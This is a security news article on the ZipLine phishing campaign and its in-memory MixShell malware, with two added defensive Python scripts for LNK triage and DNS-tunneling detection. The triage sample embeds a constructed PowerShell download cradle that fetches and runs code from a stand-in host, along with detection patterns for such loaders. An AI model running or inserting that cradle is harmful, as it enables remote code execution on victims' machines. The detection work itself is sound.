ZipLine phishing campaign uses public contact forms to drop in-memory MixShell malware, researchers say

Cybersecurity researchers have disclosed a sophisticated social engineering operation targeting supply-chain–critical manufacturing firms with an in-memory malware family named MixShell. The activity, codenamed ZipLine by Check Point Research, eschews traditional phishing emails in favor of initiating contact through a company’s public “Contact Us” form and sustaining weeks of professional, credible exchanges before delivering a weaponized ZIP file containing the MixShell payload.

According to Check Point Research, the operation unfolds over several weeks of dialogue, often including a fake non-disclosure agreement, before the attacker delivers the malicious ZIP. The archive contains a Windows shortcut (LNK) that, when opened, launches a PowerShell loader, and the loader runs MixShell in memory rather than writing an executable to disk. The implant communicates over DNS tunneling, falling back to HTTP when DNS is unavailable, and supports remote command execution, file operations, reverse proxying, stealthy persistence, and deeper movement into the target network.
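As an added example (not Check Point's code and not an artifact from the campaign), the following Python script triages a ZIP the way an analyst would on receipt: it identifies Shell Link entries by their header magic rather than by extension, walks the MS-SHLLINK structure to recover the shortcut's target path and command-line arguments, and scores them against common PowerShell-loader indicators. The sample archive, its decoy file, the shortcut name, the target path and the command line are all constructed for the demonstration; none of them is taken from the ZipLine artifacts.

```python
import io
import re
import struct
import zipfile

# MS-SHLLINK: a Shell Link starts with HeaderSize 0x4C followed by a fixed CLSID.
LNK_HEADER_SIZE = 0x4C
LNK_CLSID = b"\x01\x14\x02\x00\x00\x00\x00\x00\xc0\x00\x00\x00\x00\x00\x00\x46"
LNK_MAGIC = struct.pack("<I", LNK_HEADER_SIZE) + LNK_CLSID

# LinkFlags bits (header offset 20) that say which optional structures follow.
HAS_IDLIST, HAS_LINKINFO = 0x01, 0x02
HAS_NAME, HAS_RELPATH, HAS_WORKDIR, HAS_ARGS, HAS_ICON = 0x04, 0x08, 0x10, 0x20, 0x40
IS_UNICODE = 0x80
STRING_DATA_ORDER = [("name", HAS_NAME), ("relative_path", HAS_RELPATH),
                     ("working_dir", HAS_WORKDIR), ("arguments", HAS_ARGS),
                     ("icon_location", HAS_ICON)]

# Heuristics applied to target path + working dir + arguments (case-insensitive).
INDICATORS = [
    ("powershell", r"\b(powershell|pwsh)(\.exe)?\b"),
    ("encoded-command", r"(^|\s)-(e|ec|enc|encodedcommand)\b"),
    ("hidden-window", r"-w(indowstyle)?\s+hidden\b"),
    ("bypass-policy", r"-e(xecutionpolicy|p)\s+bypass\b"),
    ("download-cradle", r"\b(iex|invoke-expression|downloadstring|downloadfile|invoke-webrequest)\b"),
    ("lolbin", r"\b(mshta|rundll32|regsvr32|certutil|bitsadmin|wscript|cscript)(\.exe)?\b"),
]


def parse_lnk_strings(data: bytes) -> dict:
    """Return the StringData fields of a Shell Link (name, relative_path, arguments, ...)."""
    if len(data) < LNK_HEADER_SIZE or data[:20] != LNK_MAGIC:
        raise ValueError("not a Shell Link file")
    flags = struct.unpack_from("<I", data, 20)[0]
    pos = LNK_HEADER_SIZE
    if flags & HAS_IDLIST:                       # LinkTargetIDList: 2-byte size, then items
        pos += 2 + struct.unpack_from("<H", data, pos)[0]
    if flags & HAS_LINKINFO:                     # LinkInfo: 4-byte size that includes itself
        pos += struct.unpack_from("<I", data, pos)[0]
    unicode = bool(flags & IS_UNICODE)
    fields = {}
    for key, bit in STRING_DATA_ORDER:           # each: 2-byte char count, then the chars
        if not flags & bit:
            continue
        count = struct.unpack_from("<H", data, pos)[0]
        pos += 2
        raw = data[pos:pos + (count * 2 if unicode else count)]
        pos += len(raw)
        fields[key] = raw.decode("utf-16-le" if unicode else "cp1252", errors="replace")
    return fields


def lnk_indicators(fields: dict) -> list:
    text = " ".join(fields.get(k, "") for k in ("relative_path", "working_dir", "arguments"))
    return [label for label, pattern in INDICATORS if re.search(pattern, text, re.IGNORECASE)]


def scan_zip(zip_bytes: bytes) -> list:
    """Triage every ZIP entry; LNKs are recognised by magic, not by file extension."""
    findings = []
    with zipfile.ZipFile(io.BytesIO(zip_bytes)) as zf:
        for info in zf.infolist():
            if info.is_dir():
                continue
            data = zf.read(info)
            if data[:20] != LNK_MAGIC:
                continue
            try:
                fields = parse_lnk_strings(data)
                indicators = lnk_indicators(fields)
            except (struct.error, ValueError):   # truncated or hand-mangled shortcut
                fields, indicators = {}, ["malformed-lnk"]
            if re.search(r"\.(pdf|docx?|xlsx?|txt)\.lnk$", info.filename, re.IGNORECASE):
                indicators.append("double-extension")
            findings.append({"name": info.filename, "fields": fields, "indicators": indicators})
    return findings


# --- constructed sample input (hypothetical; not the campaign's real archive) ---
def build_lnk(arguments: str, relative_path: str = "") -> bytes:
    """Build a minimal Unicode Shell Link carrying only RELATIVE_PATH and ARGUMENTS."""
    flags = IS_UNICODE | HAS_ARGS | (HAS_RELPATH if relative_path else 0)
    header = LNK_MAGIC + struct.pack("<I", flags) + b"\x00" * (LNK_HEADER_SIZE - 24)

    def string_data(s: str) -> bytes:
        return struct.pack("<H", len(s)) + s.encode("utf-16-le")

    body = (string_data(relative_path) if relative_path else b"") + string_data(arguments)
    return header + body


def build_sample_zip() -> bytes:
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w") as zf:
        zf.writestr("Company_Overview.pdf", b"%PDF-1.4\n% constructed decoy\n")
        zf.writestr("NDA_Agreement.pdf.lnk", build_lnk(
            '-nop -w hidden -ep bypass -c "IEX (New-Object Net.WebClient).DownloadString(\'https://stage.example.invalid/x\')"',
            r"..\..\..\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"))
    return buf.getvalue()


if __name__ == "__main__":
    for f in scan_zip(build_sample_zip()):
        print(f["name"], f["indicators"])
        print("   ", f["fields"].get("relative_path"), f["fields"].get("arguments"))
```

The parser deliberately stops after StringData; the ExtraData blocks that follow can also carry environment-variable and console targets, so a production tool should walk those too. The indicator list is a starting point, not a verdict: a shortcut that merely opens a document scores nothing, while one whose target is PowerShell with a hidden window and a download cradle should be treated as a loader until proven otherwise.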

ZipLine appears to be broad in reach but focused on sectors critical to U.S. and global supply chains: industrial manufacturing, machinery, metalworking, components production, hardware and semiconductors, consumer goods, biotechnology, and pharmaceuticals. Targets have also been observed in Singapore, Japan, and Switzerland, so the operation is not confined to the U.S.

The campaign’s provenance remains under investigation. Check Point said it identified digital certificates shared between an attacker IP address and infrastructure previously associated with TransferLoader campaigns and with a threat cluster tracked as UNK_GreenSec; a certificate overlap of this kind is a useful pivot but, on its own, a weak basis for attribution. Check Point emphasized that the attackers rely on legitimate workflows, such as submitting a company’s contact form, to blend into normal enterprise activity and avoid early detection.

What differentiates ZipLine from high-volume or urgency-driven phishing is its measured, long-running engagement and its use of AI-themed lures, in which the attacker offers help implementing the target’s new AI initiatives. Technically, the chain combines LNK-triggered PowerShell execution, an in-memory implant, and DNS tunneling, a combination that leaves no executable on disk and no obvious HTTP beacon for traditional security controls to catch while the actor maintains persistence inside the target network.
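As an added example, not part of the original report, this Python detector applies the usual DNS-tunneling heuristics to a resolver log: long, high-entropy subdomain labels, a TXT/NULL-heavy query mix, and a stream of never-repeating query names under one registrable domain. The log format, the client addresses and the domain sync-example.invalid are constructed for the demonstration, and the "last two labels" split is a simplification of what the Public Suffix List would give.

```python
import hashlib
import math
from collections import defaultdict


def shannon_entropy(s: str) -> float:
    """Bits per character: 0 for 'www', about 3.8 for 64 characters of random hex."""
    if not s:
        return 0.0
    n = len(s)
    counts = defaultdict(int)
    for ch in s:
        counts[ch] += 1
    return -sum(c / n * math.log2(c / n) for c in counts.values())


def split_domain(qname: str):
    """Naive (registrable domain, subdomain) split; assumption: last two labels are
    the registrable part. A real deployment should consult the Public Suffix List."""
    labels = qname.rstrip(".").lower().split(".")
    if len(labels) <= 2:
        return ".".join(labels), ""
    return ".".join(labels[-2:]), ".".join(labels[:-2])


def parse_log(text: str) -> list:
    """Parse constructed lines of the form '<timestamp> <client> <qname> <qtype>'."""
    records = []
    for line in text.splitlines():
        parts = line.split()
        if len(parts) != 4:
            continue
        ts, client, qname, qtype = parts
        records.append((ts, client, qname, qtype.upper()))
    return records


def profile_domains(records: list) -> dict:
    """Aggregate per registrable domain the traits tunneling tends to exhibit."""
    acc = defaultdict(lambda: {"queries": 0, "subs": set(), "len": 0, "ent": 0.0, "txt": 0})
    for _, _, qname, qtype in records:
        base, sub = split_domain(qname)
        a = acc[base]
        a["queries"] += 1
        a["subs"].add(sub)
        a["len"] += len(sub)
        a["ent"] += shannon_entropy(sub.replace(".", ""))
        if qtype in ("TXT", "NULL"):            # record types with room for a payload
            a["txt"] += 1
    profile = {}
    for base, a in acc.items():
        n = a["queries"]
        profile[base] = {
            "queries": n,
            "distinct_subdomains": len(a["subs"]),
            "mean_sub_len": a["len"] / n,
            "mean_entropy": a["ent"] / n,
            "txt_ratio": a["txt"] / n,
        }
    return profile


def flag_tunneling(profile: dict, min_queries=10, min_len=30,
                   min_entropy=3.2, min_txt_ratio=0.5) -> list:
    """Flag a domain only when at least two independent tunneling traits coincide."""
    flagged = []
    for base, p in profile.items():
        reasons = []
        if p["mean_sub_len"] >= min_len and p["mean_entropy"] >= min_entropy:
            reasons.append("long high-entropy labels")
        if p["txt_ratio"] >= min_txt_ratio:
            reasons.append("TXT/NULL-heavy")
        if p["distinct_subdomains"] >= min_queries and p["distinct_subdomains"] == p["queries"]:
            reasons.append("no repeated query name")
        if p["queries"] >= min_queries and len(reasons) >= 2:
            flagged.append((base, reasons, p))
    return sorted(flagged, key=lambda f: f[0])


def build_sample_log() -> str:
    """Constructed log: ordinary lookups plus a burst of TXT queries whose labels
    carry hex-encoded data under the hypothetical domain sync-example.invalid."""
    lines = [
        "2025-08-19T09:00:01Z 10.0.0.12 www.example.com A",
        "2025-08-19T09:00:02Z 10.0.0.12 mail.example.com A",
        "2025-08-19T09:00:03Z 10.0.0.15 api.example.com AAAA",
        "2025-08-19T09:00:04Z 10.0.0.15 update.vendor-example.net A",
        "2025-08-19T09:00:05Z 10.0.0.12 example.com MX",
    ]
    for i in range(12):
        chunk = hashlib.sha256(f"chunk{i}".encode()).hexdigest()   # stands in for encoded data
        lines.append(f"2025-08-19T09:01:{i:02d}Z 10.0.0.12 "
                     f"{chunk[:32]}.{chunk[32:]}.sync-example.invalid TXT")
    return "\n".join(lines)


if __name__ == "__main__":
    for base, reasons, p in flag_tunneling(profile_domains(parse_log(build_sample_log()))):
        print(base, reasons, {k: round(v, 2) for k, v in p.items()})
```

Thresholds must be baselined per environment: content-delivery networks, anti-malware cloud lookups and DNS blocklists all produce long hex-like labels under a single domain, which is why the detector requires two traits to coincide and why a hit should be joined to the querying process (here, a PowerShell host with no parent in the usual software-update tree) before anyone declares an incident.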

The malicious ZIPs are hosted on a subdomain of a mainstream Platform-as-a-Service (PaaS) provider, a reminder that attackers abuse legitimate services precisely because blocking the provider’s domain outright is rarely an option. Not every ZIP served from that hosting domain is malicious; researchers note that what is delivered is customized in real time according to the attacker’s criteria, which complicates both automated detection and after-the-fact analysis and underscores the need to monitor inquiries and conversations that begin on public-facing channels.

“The ZipLine campaign is a wake-up call for every business that believes phishing is just about suspicious links in emails. Attackers are innovating faster than ever, blending human psychology, trusted communication channels, and timely AI-themed lures. To stay safe, organizations must adopt prevention-first, AI-driven defenses and build a culture of vigilance that treats every inbound interaction as a potential threat,” said Sergey Shykevich, threat intelligence group manager at Check Point Research.

For organizations seeking to mitigate risk, experts recommend limiting what public contact channels expose, verifying unusual requests out of band, and deploying AI-powered threat detection that recognizes anomalous patterns in authentic-looking conversations. As ZipLine demonstrates, attackers are increasingly weaponizing legitimate business workflows to bypass traditional security controls; a control that inspects only inbound email links never sees a conversation that starts on the company’s own website.